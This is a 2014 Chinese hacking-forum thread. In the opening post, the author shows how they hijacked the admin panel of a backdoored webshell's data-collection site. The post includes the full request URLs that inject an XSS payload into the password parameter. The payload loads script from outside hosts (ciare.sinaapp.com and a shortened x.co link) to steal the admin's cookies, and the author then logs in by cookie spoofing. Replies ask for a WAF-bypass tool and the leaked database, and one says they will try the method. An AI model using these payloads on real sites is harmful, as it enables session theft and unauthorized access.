查看: 32797|回复: 13

巧妙利用XSS日下Webshell后门箱子

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-5-4 17:12:46 | 显示全部楼层 |阅读模式
    这篇文章是我首发法客论坛的,今天有人要,我就在转回来

    好久没有日站了,前几天刚刚换了一台电脑。用起来实在喜欢。
    好了开始吧。
    经常会发现自己没有带asp什么木马带。会百度一下,然后随便下载一个用一下。
    110721iietiuuommutohtt.jpg
    Mumaasp.com
    我随便下载了一个,才知道这个是一个大箱子。
    各种淫荡带想法开始了。
    下载一个木马。在本地架设。网址嗅探看下都是什么东西。
    110722m6oternco9oocooz.jpg
    [AppleScript] 纯文本查看 复制代码
    http://www.mumaasp.com/xz/sx.asp?u=localhost/mumaasp.asp&p=mumaasp.com

    这个localhost/mumaasp.asp不是我带木马连接吗?
    mumaasp.com不是木马的密码嘛。
    一下子,我大概知道了。
    我们构造一下,在密码部分插入xss
    [AppleScript] 纯文本查看 复制代码
    http://www.mumaasp.com/xz/sx.asp?u=localhost/mumaasp.asp&p=mumaasp.com<script src="http://ciare.sinaapp.com/?u=3352cb"></script>

    在浏览器直接回车打开,构造进去。
    110723dcgbb0q0z68dkagc.jpg
    纳尼,死狗。不怕,我有打狗棒法。
    110724js3xpq438gzuqqpi.jpg
    又出现这个问题。字段太小而不能接受所要添加的数据的数量。试着插入或粘贴较少的数据。
    那我们缩短下xss代码试试
    [AppleScript] 纯文本查看 复制代码
    http://www.mumaasp.com/xz/sx.asp?u=localhost/mumaasp.asp&p=mm<script src="http://x.co/15Flj"></script>

    110725fk5vcv5e9vci2v54.jpg
    显示的是白色页面。难道差进去了嘛?耐心等一下。
    到下午。没过多久。邮箱就开始提示来快递了。
    110726hp30y0z4jphp3hzp.jpg
    上cookie欺骗
    1107314rzfn7nzyv1rmjfv.jpg
    仅供参考~~

    评分

    参与人数 1i币 +4 收起 理由
    90_ + 4

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-5-4 17:30:19 | 显示全部楼层
    本帖为密码帖 ,请输入密码 
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-7-16 21:37
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 2014-5-4 19:28:17 | 显示全部楼层
    你是说他接受shell的是后台?而不是单个允许访问的页面?

    点评

    接受shell的是一个页面,但是访问箱子的是一个后台  详情 回复 发表于 2014-5-5 09:48
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-4 19:46:17 | 显示全部楼层
    按照国际惯例 箱子是要发出来的 不然会被轮的
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-4 22:40:43 | 显示全部楼层
    这个方法好,我也去试试
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-4 23:38:17 | 显示全部楼层
    求过狗神器
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-5 06:19:20 | 显示全部楼层
    求裤子啊         
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

     楼主| 发表于 2014-5-5 09:48:45 | 显示全部楼层
    U神V5 发表于 2014-5-4 19:28
    你是说他接受shell的是后台?而不是单个允许访问的页面?

    接受shell的是一个页面,但是访问箱子的是一个后台
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-5 17:26:42 | 显示全部楼层
    感谢分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-4-24 14:55
  • 签到天数: 54 天

    [LV.5]常住居民I

    发表于 2014-5-6 13:32:57 | 显示全部楼层
    老狗到是好弄,那新狗怎么搞?
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-19 04:26 , Processed in 0.029210 second(s), 19 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部